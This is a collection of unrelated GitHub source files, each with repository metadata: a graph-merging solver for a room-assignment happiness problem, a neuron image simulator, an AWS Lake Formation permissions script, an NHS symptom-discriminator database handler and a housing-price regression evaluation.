np.random.geometric(p=prob, size = 1).item(0)\n sorted_stress = sorted(G_stress.edges(data=True), key=lambda y: (y[2][\"stress\"], -y[2][\"happiness\"]), reverse=False)\n if len(sorted_stress) == 0:\n break\n #need to merge nodes A and B\n i = i % len(sorted_stress)\n n1, n2, _ = sorted_stress[i]\n if G_stress.nodes[n1].get(\"stress\", 0) + G_stress.nodes[n2].get(\"stress\", 0) + G_stress.edges[n1, n2][\"stress\"] <= smax:\n merge(G_stress, n1, n2)\n \n else:\n G_stress.remove_edge(n1,n2)\n \n\n if nx.number_of_nodes(G_stress) == k:\n room = 0\n for node in list(G_stress.nodes):\n if isinstance(node, int):\n temp = [node]\n else:\n temp = node.split(' ')\n temp = [int(x) for x in temp]\n curr_D[room] = temp\n room += 1\n curr_D = convert_dictionary(curr_D)\n \n else:\n continue\n \n if is_valid_solution(curr_D, G, s, k):\n if calculate_happiness(curr_D, G) > best_H_so_far:\n best_D_so_far = curr_D\n best_k_so_far = k\n best_H_so_far = calculate_happiness(curr_D, G)\n #\n # pass\n return best_D_so_far, best_k_so_far\n\ndef merge(G, n1, n2):\n \n neighbors = nx.common_neighbors(G, n1, n2)\n # Create the new node with combined name\n name = str(n1) + ' ' + str(n2)\n G.add_node(name)\n #nx.set_node_attributes(G, values, name=None)\n G.nodes[name][\"happiness\"] = G.nodes[n1].get(\"happiness\", 0) + G.nodes[n2].get(\"happiness\", 0) + G.edges[n1, n2][\"happiness\"]\n G.nodes[name][\"stress\"] = G.nodes[n1].get(\"stress\", 0) + G.nodes[n2].get(\"stress\", 0) + G.edges[n1, n2][\"stress\"]\n\n\n for p in neighbors:\n G.add_edge(p,name)\n G[p][name][\"happiness\"] = G[p][n1][\"happiness\"] + 
G[p][n2][\"happiness\"]\n G[p][name][\"stress\"] = G[p][n1][\"stress\"] + G[p][n2][\"stress\"]\n \n # Remove old nodes\n G.remove_nodes_from([n1, n2])\n\n\n\n\n\n\n\n\n\n\n\n #name = \"Andrew\"\n #my.pp[name] = \"smol compared to eiffel tower big compared to a water bottle made for ants that are 6 feet tall\"\n #len(pp.extend(simp.get(\"Andrew\")) = 1 \n #len(simp.get(\"Andrew\").pp) == -1 * sys.maxint -> TRUE\n #print(\"gimmeee one.. gimme twooo seconds\" + \"- kdrama simp\")\n #\\ ^__^\n # \\ (oo)\\_______\n # (__)\\ )\\/\\\n # ||----w |\n # || ||\n\n\n #neeenerrrrrrneeeneeerrruihuhuihuihu\n \n\n# Here's an example of how to run your solver.\n\n# Usage: python3 solver.py test.in\n\n\"\"\"\nif __name__ == '__main__':\n assert len(sys.argv) == 2\n path = sys.argv[1]\n G, s = read_input_file(path)\n D, k = solve_kinda(G, s, 300)\n assert is_valid_solution(D, G, s, k)\n print(D)\n print(k)\n print(\"Total Happiness: {}\".format(calculate_happiness(D, G)))\n write_output_file(D, 'results')\n\"\"\"\n\n# For testing a folder of inputs to create a folder of outputs, you can use glob (need to import it)\nif __name__ == '__main__':\n inputs = glob.glob('andrewbigins/*')\n for input_path in inputs:\n output_path = 'andrewbigouts/' + basename(normpath(input_path))[:-3] + '.out'\n G, s = read_input_file(input_path, 100)\n D, k = solve_kinda(G, s)\n assert is_valid_solution(D, G, s, k)\n #cost_t = calculate_happiness(T)\n write_output_file(D, output_path)\n", "repo_name": "andrewzzhao/MaxHappinessAlgo", "sub_path": "solver.py", "file_name": "solver.py", "file_ext": "py", "file_size_in_byte": 9645, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "networkx.number_of_nodes", "line_number": 27, "usage_type": "call"}, {"api_name": "networkx.number_of_nodes", "line_number": 33, "usage_type": "call"}, {"api_name": "networkx.number_of_nodes", "line_number": 47, "usage_type": "call"}, {"api_name": "utils.convert_dictionary", "line_number": 57, "usage_type": "call"}, {"api_name": "utils.is_valid_solution", "line_number": 62, "usage_type": "call"}, {"api_name": "utils.calculate_happiness", "line_number": 63, "usage_type": "call"}, {"api_name": "utils.calculate_happiness", "line_number": 66, "usage_type": "call"}, {"api_name": "utils.calculate_happiness", "line_number": 77, "usage_type": "call"}, {"api_name": "utils.calculate_happiness", "line_number": 78, "usage_type": "call"}, {"api_name": "utils.calculate_happiness", "line_number": 90, "usage_type": "call"}, {"api_name": "utils.calculate_happiness", "line_number": 91, "usage_type": "call"}, {"api_name": "utils.calculate_happiness", "line_number": 103, "usage_type": "call"}, {"api_name": "utils.calculate_happiness", "line_number": 104, "usage_type": "call"}, {"api_name": "networkx.number_of_nodes", "line_number": 132, "usage_type": "call"}, {"api_name": "networkx.number_of_nodes", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.random.geometric", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 139, "usage_type": "attribute"}, {"api_name": "networkx.number_of_nodes", "line_number": 155, "usage_type": "call"}, {"api_name": "utils.convert_dictionary", "line_number": 165, "usage_type": "call"}, {"api_name": "utils.is_valid_solution", "line_number": 170, "usage_type": "call"}, {"api_name": "utils.calculate_happiness", "line_number": 171, "usage_type": "call"}, {"api_name": "utils.calculate_happiness", "line_number": 174, 
"usage_type": "call"}, {"api_name": "networkx.number_of_nodes", "line_number": 193, "usage_type": "call"}, {"api_name": "networkx.number_of_nodes", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.random.geometric", "line_number": 201, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 201, "usage_type": "attribute"}, {"api_name": "networkx.number_of_nodes", "line_number": 215, "usage_type": "call"}, {"api_name": "utils.convert_dictionary", "line_number": 225, "usage_type": "call"}, {"api_name": "utils.is_valid_solution", "line_number": 230, "usage_type": "call"}, {"api_name": "utils.calculate_happiness", "line_number": 231, "usage_type": "call"}, {"api_name": "utils.calculate_happiness", "line_number": 234, "usage_type": "call"}, {"api_name": "networkx.common_neighbors", "line_number": 241, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 302, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 304, "usage_type": "call"}, {"api_name": "os.path.normpath", "line_number": 304, "usage_type": "call"}, {"api_name": "parse.read_input_file", "line_number": 305, "usage_type": "call"}, {"api_name": "utils.is_valid_solution", "line_number": 307, "usage_type": "call"}, {"api_name": "parse.write_output_file", "line_number": 309, "usage_type": "call"}]} +{"seq_id": "29010569995", "text": "import copy\nimport os.path\nimport pathlib\nimport random\n\nimport numpy as np\nfrom artifacts import Artifacts\nfrom background import Background\n# from matplotlib import pyplot as plt\nfrom nucleus import Nucleus\nfrom point import Point\nfrom skimage import draw, io\nfrom skimage.exposure import rescale_intensity\nfrom spheroid import Spheroid\nfrom tqdm import tqdm\n\nif __name__ == \"__main__\":\n\n img_size = 1024\n anti_aliasing_threshold = 9\n out_folder_name = \"test_upgrade\"\n img_size_percent = int((img_size / 100) * 5)\n for idx in tqdm(range(2000, 3000)):\n nucleus_size = random.randint(50, 80)\n # 461 <= x <= 563\n x = (img_size / 2) + random.randint(-img_size_percent, img_size_percent)\n y = (img_size / 2) + random.randint(-img_size_percent, img_size_percent)\n centroid = Point(x, y)\n spheroid = Spheroid(\n centroid=centroid,\n neuron_number=random.randint(150, 250),\n cover_angle=360,\n min_max_radius=[\n random.randint(10, 40),\n random.randint(350, img_size - x - 1),\n ],\n offset_delta=[2, 4],\n division_nb=[2, 4],\n min_max_intensity=[random.randint(50, 70), random.randint(130, 180)],\n )\n\n spheroid.create_neurons()\n spheroid.add_random_neurons(random.randint(5, 10))\n\n perlin_noise_level = random.choice([2, 4, 8, 16])\n poisson_noise_level = random.randint(50, 100)\n perlin_out_range = random.randint(50, 100)\n full_noise_level = random.randint(80, 100)\n smooth_sigma = random.randint(1, 3)\n\n img = Background(\n img_size,\n perlin_noise_level,\n poisson_noise_level,\n perlin_out_range,\n full_noise_level,\n )\n img.create_background()\n # img.smooth_background(smooth_sigma)\n enhanced = copy.deepcopy(img)\n\n ################################\n # #### Apply elastic transform on noise\n # cmin = int(norm_sum_noise.shape[0] / 2 - img_size / 2)\n # cmax = int(norm_sum_noise.shape[0] / 2 + img_size / 2)\n # crop = (slice(cmin, cmax), slice(cmin, cmax))\n # noise_elastic = elasticdeform.deform_random_grid(\n # norm_sum_noise, sigma=random.randint(10, 20),\n # points=random.randint(2, 6), crop=crop)\n # full_noise = rescale_intensity(noise_elastic,\n # out_range=(0, full_noise_level))\n #\n # target = img.copy()\n # img += 
full_noise\n # img = rescale_intensity(img, out_range=(0, 255))\n\n ################################\n\n for neuron in spheroid.neuron_list:\n if neuron.anti_aliasing > anti_aliasing_threshold:\n for seg in neuron.segmentList:\n rr, cc, val = draw.line_aa(\n seg.startPoint.x,\n seg.startPoint.y,\n seg.endPoint.x,\n seg.endPoint.y,\n )\n img.noise_map[rr, cc] = val * neuron.intensity\n enhanced.noise_map[rr, cc] = 250\n else:\n for seg in neuron.segmentList:\n rr, cc = draw.line(\n seg.startPoint.x,\n seg.startPoint.y,\n seg.endPoint.x,\n seg.endPoint.y,\n )\n # if rr.any() < img_size and cc.any() < img_size:\n img.noise_map[rr, cc] = neuron.intensity\n enhanced.noise_map[rr, cc] = 250\n\n artifacts = Artifacts(\n img_size=img_size,\n artifacts_nb=random.randint(10, 50),\n intensity=spheroid.min_max_intensity,\n )\n artifacts.create_artifacts_map()\n enhanced.noise_map = enhanced.noise_map + artifacts.artifacts_map\n img.noise_map = img.noise_map + artifacts.artifacts_map\n\n enhanced.noise_map = rescale_intensity(enhanced.noise_map, out_range=(0, 255))\n img.noise_map = rescale_intensity(img.noise_map, out_range=(0, 255))\n\n nucl = Nucleus(\n kernel_size=20,\n std=4,\n image_size=img_size,\n radius=nucleus_size,\n centroid=centroid,\n )\n nucl.create_nucleus()\n result = img.noise_map * nucl.nucleus\n enhanced = enhanced.noise_map * nucl.nucleus\n\n enhanced = rescale_intensity(enhanced, out_range=(0, 255))\n result = rescale_intensity(result, out_range=(0, 255))\n\n # plt.figure(dpi=600)\n # plt.imsave(\"nucleus.png\", nucl.nucleus, cmap=\"gray\")\n\n root = os.path.split(os.path.dirname(os.path.abspath(__file__)))[0]\n pathlib.Path(os.path.join(root, \"data\", out_folder_name, \"images\")).mkdir(\n parents=True, exist_ok=True\n )\n pathlib.Path(os.path.join(root, \"data\", out_folder_name, \"target\")).mkdir(\n parents=True, exist_ok=True\n )\n\n io.imsave(\n os.path.join(root, \"data\", out_folder_name, \"images\", str(idx) + \".png\"),\n result.astype(np.uint8),\n )\n io.imsave(\n os.path.join(root, \"data\", out_folder_name, \"target\", str(idx) + \".png\"),\n enhanced.astype(np.uint8),\n )\n", "repo_name": "ebouilhol/neuron_simulator", "sub_path": "spheroid_simulator/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 5317, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "tqdm.tqdm", "line_number": 23, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 24, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 26, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 27, "usage_type": "call"}, {"api_name": "point.Point", "line_number": 28, "usage_type": "call"}, {"api_name": "spheroid.Spheroid", "line_number": 29, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 31, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 34, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 35, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 39, "usage_type": "call"}, {"api_name": "spheroid.create_neurons", "line_number": 42, "usage_type": "call"}, {"api_name": "spheroid.add_random_neurons", "line_number": 43, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 43, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 45, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 46, "usage_type": "call"}, {"api_name": "random.randint", 
"line_number": 47, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 48, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 49, "usage_type": "call"}, {"api_name": "background.Background", "line_number": 51, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 60, "usage_type": "call"}, {"api_name": "spheroid.neuron_list", "line_number": 79, "usage_type": "attribute"}, {"api_name": "skimage.draw.line_aa", "line_number": 82, "usage_type": "call"}, {"api_name": "skimage.draw", "line_number": 82, "usage_type": "name"}, {"api_name": "skimage.draw.line", "line_number": 92, "usage_type": "call"}, {"api_name": "skimage.draw", "line_number": 92, "usage_type": "name"}, {"api_name": "artifacts.Artifacts", "line_number": 102, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 104, "usage_type": "call"}, {"api_name": "spheroid.min_max_intensity", "line_number": 105, "usage_type": "attribute"}, {"api_name": "artifacts.create_artifacts_map", "line_number": 107, "usage_type": "call"}, {"api_name": "artifacts.artifacts_map", "line_number": 108, "usage_type": "attribute"}, {"api_name": "artifacts.artifacts_map", "line_number": 109, "usage_type": "attribute"}, {"api_name": "skimage.exposure.rescale_intensity", "line_number": 111, "usage_type": "call"}, {"api_name": "skimage.exposure.rescale_intensity", "line_number": 112, "usage_type": "call"}, {"api_name": "nucleus.Nucleus", "line_number": 114, "usage_type": "call"}, {"api_name": "skimage.exposure.rescale_intensity", "line_number": 125, "usage_type": "call"}, {"api_name": "skimage.exposure.rescale_intensity", "line_number": 126, "usage_type": "call"}, {"api_name": "os.path.path.split", "line_number": 131, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 131, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 131, "usage_type": "name"}, {"api_name": "os.path.path.dirname", "line_number": 131, "usage_type": "call"}, {"api_name": "os.path.path.abspath", "line_number": 131, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 132, "usage_type": "call"}, {"api_name": "os.path.path.join", "line_number": 132, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 132, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 132, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 135, "usage_type": "call"}, {"api_name": "os.path.path.join", "line_number": 135, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 135, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 135, "usage_type": "name"}, {"api_name": "skimage.io.imsave", "line_number": 139, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 139, "usage_type": "name"}, {"api_name": "os.path.path.join", "line_number": 140, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 140, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 140, "usage_type": "name"}, {"api_name": "numpy.uint8", "line_number": 141, "usage_type": "attribute"}, {"api_name": "skimage.io.imsave", "line_number": 143, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 143, "usage_type": "name"}, {"api_name": "os.path.path.join", "line_number": 144, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 144, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 144, "usage_type": "name"}, {"api_name": "numpy.uint8", "line_number": 145, "usage_type": "attribute"}]} +{"seq_id": 
"13776914212", "text": "import boto3\n\n\nclass AWSGlueStarter:\n\n def __init__(self):\n\n self._session = boto3.Session()\n self._glue = self._session.client('glue')\n self._lakeformation = self._session.client('lakeformation')\n\n self._iam_allowed_principal = {'DataLakePrincipalIdentifier': 'IAM_ALLOWED_PRINCIPALS'}\n\n def _modify_lake_settings(self):\n print('1. Modifying Data Lake Settings to use IAM Controls only...')\n data_lake_setting = self._lakeformation.get_data_lake_settings()['DataLakeSettings']\n data_lake_setting['CreateDatabaseDefaultPermissions'] = [{'Principal': self._iam_allowed_principal,\n 'Permissions': ['ALL']}]\n data_lake_setting['CreateTableDefaultPermissions'] = [{'Principal': self._iam_allowed_principal,\n 'Permissions': ['ALL']}]\n self._lakeformation.put_data_lake_settings(DataLakeSettings=data_lake_setting)\n\n def _de_register(self):\n res = self._lakeformation.list_resources()\n resources = res['ResourceInfoList']\n while 'NextToken' in res:\n res = self._lakeformation.list_resources(NextToken=res['NextToken'])\n resources.extend(res['ResourceInfoList'])\n for r in resources:\n print('... Deregistering ' + r['ResourceArn'] + '...')\n self._lakeformation.deregister_resource(ResourceArn=r['ResourceArn'])\n\n\n def _grant_db_access(self):\n catalog_resource = {'Catalog': {}}\n self._lakeformation.grant_permissions(Principal=self._iam_allowed_principal,\n Resource=catalog_resource,\n Permissions=['CREATE_DATABASE'],\n PermissionsWithGrantOption=[])\n\n def _iam_allowed_principals(self):\n databases = []\n get_databases_paginator = self._glue.get_paginator('get_databases')\n for page in get_databases_paginator.paginate():\n databases.extend(page['DatabaseList'])\n for d in databases:\n print('...Granting permissions on database ' + d['Name'] + '...')\n\n database_resource = {'Database': {'Name': d['Name']}}\n self._lakeformation.grant_permissions(Principal=self._iam_allowed_principal,\n Resource=database_resource,\n Permissions=['ALL'],\n PermissionsWithGrantOption=[])\n\n location_uri = d.get('LocationUri')\n if location_uri is not None and location_uri != '':\n database_input = {\n 'Name': d['Name'],\n 'Description': d.get('Description', ''),\n 'LocationUri': location_uri,\n 'Parameters': d.get('Parameters', {}),\n 'CreateTableDefaultPermissions': [\n {\n 'Principal': self._iam_allowed_principal,\n 'Permissions': ['ALL']\n }\n ]\n }\n else:\n database_input = {\n 'Name': d['Name'],\n 'Description': d.get('Description', ''),\n 'Parameters': d.get('Parameters', {}),\n 'CreateTableDefaultPermissions': [\n {\n 'Principal': self._iam_allowed_principal,\n 'Permissions': ['ALL']\n }\n ]\n }\n self._glue.update_database(Name=d['Name'],\n DatabaseInput=database_input)\n\n\n def _table_access(self):\n tables = []\n get_tables_paginator = self._glue.get_paginator('get_tables')\n for page in get_tables_paginator.paginate(DatabaseName= d['Name']):\n tables.extend(page['TableList'])\n\n databases = []\n get_databases_paginator = self._glue.get_paginator('get_databases')\n for page in get_databases_paginator.paginate():\n databases.extend(page['DatabaseList'])\n\n for d in databases:\n for t in tables:\n print('...Granting permissions on table ' + d['Name'] + '...')\n table_resource = {'Table': {'DatabaseName': d['Name'], 'Name': t['Name']}}\n self._lakeformation.grant_permissions(Principal=self._iam_allowed_principal,\n Resource=table_resource,\n Permissions=['ALL'],\n PermissionsWithGrantOption=[])\n\n\n def _revoke_permissions (self):\n print('5. 
Revoking all the permissions except IAM_ALLOWED_PRINCIPALS...')\n        res = self._lakeformation.list_permissions()\n        permissions = res['PrincipalResourcePermissions']\n        while 'NextToken' in res:\n            res = self._lakeformation.list_permissions(NextToken=res['NextToken'])\n            permissions.extend(res['PrincipalResourcePermissions'])\n\n        # Each permission entry already identifies its principal and resource,\n        # so revoke each entry once rather than once per database.\n        for p in permissions:\n            if p['Principal']['DataLakePrincipalIdentifier'] != 'IAM_ALLOWED_PRINCIPALS':\n                print('...Revoking permissions of ' + p['Principal']['DataLakePrincipalIdentifier'] + '...')\n                self._lakeformation.revoke_permissions(Principal=p['Principal'],\n                                                       Resource=p['Resource'],\n                                                       Permissions=p['Permissions'],\n                                                       PermissionsWithGrantOption=p['PermissionsWithGrantOption'])\n\n\ndef main():\n    gl = AWSGlueStarter()", "repo_name": "pkr06/AWS", "sub_path": "glue.py", "file_name": "glue.py", "file_ext": "py", "file_size_in_byte": 6114, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "boto3.Session", "line_number": 8, "usage_type": "call"}]}
{"seq_id": "30921664269", "text": "import psycopg2\nimport psycopg2.extras\nfrom utilities import logger, message, common, database, common_file_processing\nfrom datetime import datetime\n\ncsv_column_count = 3\ndata_column_count = 3\n\ntask_description = \"Symptom group symptom discriminators\"\n\n\ndef request(event, context):\n    start = datetime.utcnow()\n    message.send_start_message(event, start)\n    print(\"Event: {}\".format(event))\n    env = event[\"env\"]\n    filename = event[\"filename\"]\n    bucket = event[\"bucket\"]\n    logger.log_for_audit(env, \"action=task started\")\n    try:\n        summary_count_dict = common.initialise_summary_count()\n        db_connection = database.connect_to_database(env)\n        csv_file = common.retrieve_file_from_bucket(bucket, filename, event, start)\n        csv_data = common_file_processing.process_ids_file(csv_file, event, csv_column_count, summary_count_dict)\n        if csv_data == {}:\n            message.send_failure_slack_message(event, start, summary_count_dict)\n        else:\n            process_extracted_data(db_connection, csv_data, summary_count_dict, event)\n            message.send_success_slack_message(event, start, summary_count_dict)\n        common.report_summary_counts(summary_count_dict, env)\n        logger.log_for_audit(env, \"action=task complete\")\n    except Exception as e:\n        logger.log_for_error(env, \"Problem {}\".format(e))\n        message.send_failure_slack_message(event, start)\n    finally:\n        if db_connection is not None:\n            database.close_connection(env, db_connection)\n        common.archive_file(bucket, filename, event, start)\n    return task_description + \" execution completed\"\n\n\ndef generate_db_query(row_values, env):\n    if row_values[\"action\"] == (\"CREATE\"):\n        return create_query(row_values)\n    elif row_values[\"action\"] == (\"DELETE\"):\n        return delete_query(row_values)\n    else:\n        logger.log_for_error(env, \"action=validation | {} not in approved list of actions\".format(row_values[\"action\"]))\n        raise psycopg2.DatabaseError(\"Database Action {} is invalid\".format(row_values[\"action\"]))\n\n\ndef create_query(row_values):\n    query = \"\"\"\n        insert into pathwaysdos.symptomgroupsymptomdiscriminators\n        (symptomgroupid, symptomdiscriminatorid) values (%s, %s)\n        returning symptomgroupid, symptomdiscriminatorid;\n    \"\"\"\n    data = (\n        row_values[\"id1\"],\n        
row_values[\"id2\"],\n    )\n    return query, data\n\n\ndef delete_query(row_values):\n    query = \"\"\"\n        delete from pathwaysdos.symptomgroupsymptomdiscriminators\n        where symptomgroupid = (%s) and symptomdiscriminatorid = (%s)\n    \"\"\"\n    data = (\n        row_values[\"id1\"],\n        row_values[\"id2\"],\n    )\n    return query, data\n\n\ndef record_exists_query(row_values):\n    query = \"\"\"\n        select * from pathwaysdos.symptomgroupsymptomdiscriminators\n        where symptomgroupid = (%s) and symptomdiscriminatorid = (%s)\n    \"\"\"\n    data = (\n        row_values[\"id1\"],\n        row_values[\"id2\"],\n    )\n    return query, data\n\n\ndef process_extracted_data(db_connection, row_data, summary_count_dict, event):\n    for row_number, row_values in row_data.items():\n        try:\n            record_exists = does_sgd_record_exist(db_connection, row_values, event[\"env\"])\n            if common.valid_action(record_exists, row_values, event[\"env\"], \"UPDATE\"):\n                query, data = generate_db_query(row_values, event[\"env\"])\n                database.execute_db_query(\n                    db_connection, query, data, row_number, row_values, summary_count_dict, event[\"env\"]\n                )\n            else:\n                common.increment_summary_count(summary_count_dict, \"ERROR\", event[\"env\"])\n        except Exception as e:\n            logger.log_for_error(\n                event[\"env\"],\n                \"Processing {0} data failed with |{1}|{2}| => {3}\".format(\n                    task_description, row_values[\"id1\"], row_values[\"id2\"], str(e)\n                ),\n            )\n            raise e\n\n\ndef does_sgd_record_exist(db_connection, row_values, env):\n    \"\"\"\n    Checks to see if record already exists in db table with the symptomgroupid and symptomdiscriminatorid\n    \"\"\"\n    record_exists = False\n    try:\n        with db_connection.cursor(cursor_factory=psycopg2.extras.DictCursor) as cursor:\n            query, data = record_exists_query(row_values)\n            cursor.execute(query, data)\n            if cursor.rowcount != 0:\n                record_exists = True\n    except (Exception, psycopg2.Error) as e:\n        logger.log_for_error(\n            env,\n            \"Select from symptomgroupsymptomdiscriminators by sgid and sdid failed - {0} , {1} => {2}\".format(\n                row_values[\"id1\"], row_values[\"id2\"], str(e)\n            ),\n        )\n        raise e\n    return record_exists\n", "repo_name": "nhsd-exeter/dos-tasks", "sub_path": "application/hk/symptomgroupdiscriminators/handler.py", "file_name": "handler.py", "file_ext": "py", "file_size_in_byte": 4776, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "datetime.datetime.utcnow", "line_number": 13, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 13, "usage_type": "name"}, {"api_name": "utilities.message.send_start_message", "line_number": 14, "usage_type": "call"}, {"api_name": "utilities.message", "line_number": 14, "usage_type": "name"}, {"api_name": "utilities.logger.log_for_audit", "line_number": 19, "usage_type": "call"}, {"api_name": "utilities.logger", "line_number": 19, "usage_type": "name"}, {"api_name": "utilities.common.initialise_summary_count", "line_number": 21, "usage_type": "call"}, {"api_name": "utilities.common", "line_number": 21, "usage_type": "name"}, {"api_name": "utilities.database.connect_to_database", "line_number": 22, "usage_type": "call"}, {"api_name": "utilities.database", "line_number": 22, "usage_type": "name"}, {"api_name": "utilities.common.retrieve_file_from_bucket", "line_number": 23, "usage_type": "call"}, {"api_name": "utilities.common", "line_number": 23, "usage_type": "name"}, {"api_name": "utilities.common_file_processing.process_ids_file", "line_number": 24, "usage_type": "call"}, {"api_name": "utilities.common_file_processing", 
"line_number": 24, "usage_type": "name"}, {"api_name": "utilities.message.send_failure_slack_message", "line_number": 26, "usage_type": "call"}, {"api_name": "utilities.message", "line_number": 26, "usage_type": "name"}, {"api_name": "utilities.message.send_success_slack_message", "line_number": 29, "usage_type": "call"}, {"api_name": "utilities.message", "line_number": 29, "usage_type": "name"}, {"api_name": "utilities.common.report_summary_counts", "line_number": 30, "usage_type": "call"}, {"api_name": "utilities.common", "line_number": 30, "usage_type": "name"}, {"api_name": "utilities.logger.log_for_audit", "line_number": 31, "usage_type": "call"}, {"api_name": "utilities.logger", "line_number": 31, "usage_type": "name"}, {"api_name": "utilities.logger.log_for_error", "line_number": 33, "usage_type": "call"}, {"api_name": "utilities.logger", "line_number": 33, "usage_type": "name"}, {"api_name": "utilities.message.send_failure_slack_message", "line_number": 34, "usage_type": "call"}, {"api_name": "utilities.message", "line_number": 34, "usage_type": "name"}, {"api_name": "utilities.database.close_connection", "line_number": 37, "usage_type": "call"}, {"api_name": "utilities.database", "line_number": 37, "usage_type": "name"}, {"api_name": "utilities.common.archive_file", "line_number": 38, "usage_type": "call"}, {"api_name": "utilities.common", "line_number": 38, "usage_type": "name"}, {"api_name": "utilities.logger.log_for_error", "line_number": 48, "usage_type": "call"}, {"api_name": "utilities.logger", "line_number": 48, "usage_type": "name"}, {"api_name": "psycopg2.DatabaseError", "line_number": 49, "usage_type": "call"}, {"api_name": "utilities.common.valid_action", "line_number": 93, "usage_type": "call"}, {"api_name": "utilities.common", "line_number": 93, "usage_type": "name"}, {"api_name": "utilities.database.execute_db_query", "line_number": 95, "usage_type": "call"}, {"api_name": "utilities.database", "line_number": 95, "usage_type": "name"}, {"api_name": "utilities.common.increment_summary_count", "line_number": 99, "usage_type": "call"}, {"api_name": "utilities.common", "line_number": 99, "usage_type": "name"}, {"api_name": "utilities.logger.log_for_error", "line_number": 101, "usage_type": "call"}, {"api_name": "utilities.logger", "line_number": 101, "usage_type": "name"}, {"api_name": "psycopg2.extras", "line_number": 116, "usage_type": "attribute"}, {"api_name": "psycopg2.Error", "line_number": 121, "usage_type": "attribute"}, {"api_name": "utilities.logger.log_for_error", "line_number": 122, "usage_type": "call"}, {"api_name": "utilities.logger", "line_number": 122, "usage_type": "name"}]} +{"seq_id": "19279470696", "text": "import numpy as np\nfrom utils import Utils\nfrom sklearn.model_selection import KFold\nfrom sklearn.metrics import mean_absolute_error, r2_score\nfrom sklearn import svm\nfrom sklearn import preprocessing\nfrom sklearn.linear_model import BayesianRidge, LogisticRegression, SGDRegressor, Perceptron, PassiveAggressiveRegressor, RANSACRegressor, TheilSenRegressor\nfrom sklearn.ensemble import RandomForestRegressor\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\n\n\n# Train and test using the given classifier with k-fold cross-validation\ndef classify(X, y, k, clf):\n\t# Split data into folds\n\tkf = KFold(n_splits=k, shuffle=True)\n\tsplits = kf.split(X)\n\t\n\tabs_err = 0\n\tper_err = 0\n\tcount = 0\n\tr2_scores = 0\n\n\tfor train_index, test_index in splits:\n\t\tX_train, X_test = X[train_index], X[test_index]\n\t\ty_train, 
y_test = y[train_index], y[test_index]\n\t\tclf.fit(X_train, y_train)\n\t\ty_pred = clf.predict(X_test)\n\n\t\tabs_err += mean_absolute_error(y_test, y_pred)\n\t\tper_err += np.mean(np.abs((y_test - y_pred) / y_test) * 100)\n\t\tr2_scores += r2_score(y_test, y_pred)\n\n\t#Some statistics\n\tfor i in range(len(y_pred)):\n\t\tif np.mean(np.abs((y_test[i]-y_pred[i]))/y_test[i])*100 >= 20:\n\t\t\t'''print(\"True price: \" + str(round(y_test[i], 2)) + \n\t\t\t\t\t \"\\nEst. price: \" + str(round(y_pred[i], 2)) +\n\t\t\t\t\t \"\\nAbsolute error: \" + str(round(np.abs(y_test[i]-y_pred[i]), 2)) +\n\t\t\t\t\t \"\\nPercentage error: \" + str(round(np.mean(np.abs((y_test[i]-y_pred[i]))/y_test[i])*100, 2)) +\n\t\t\t\t\t \"\\nBuilding type: \" + str(round(X_test[i][6], 2)) + \"\\n\")\n\t\t\t'''\n\t\t\tcount += 1\n\n\tprint(\"===========================================================\")\n\tprint(\"Number of properties with >= 20% error: \" + str(count))\n\tprint(\"Mean absolute percentage error: \" + str(round(per_err/k, 2)))\n\tprint(\"Mean absolute error: \" + str(round(abs_err/k, 2)))\n\tprint(\"Mean R2 scores: \" + str(round(r2_scores/k, 2)))\n\tprint(\"\")\n\n\t#Note: plots only last split of data (~650 instances for Vic+Van data)\n\tdif_plot(y_test, y_pred)\n\ndef dif_plot(y_test, y_pred):\n\tplt.rcParams['legend.numpoints'] = 2\n\n\tfig, ax = plt.subplots(figsize=(12,8))\n\n\tfor i in range(len(y_pred)):\n\t\tplt.plot([i, i], [y_pred[i], y_test[i]], c='k', lw=0.5)\n\n\tax.plot(y_pred, 'o', label='Prediction', color='g')\n\tax.plot(y_test, '^', label='Ground Truth', color='r')\n\n\tax.set_xlim((-1, len(y_pred)))\n\t\n\tax.set_yscale('log')\n\tax.set_yticks([100000, 200000, 500000, 1000000, 2500000, 5000000, 10000000, 20000000, 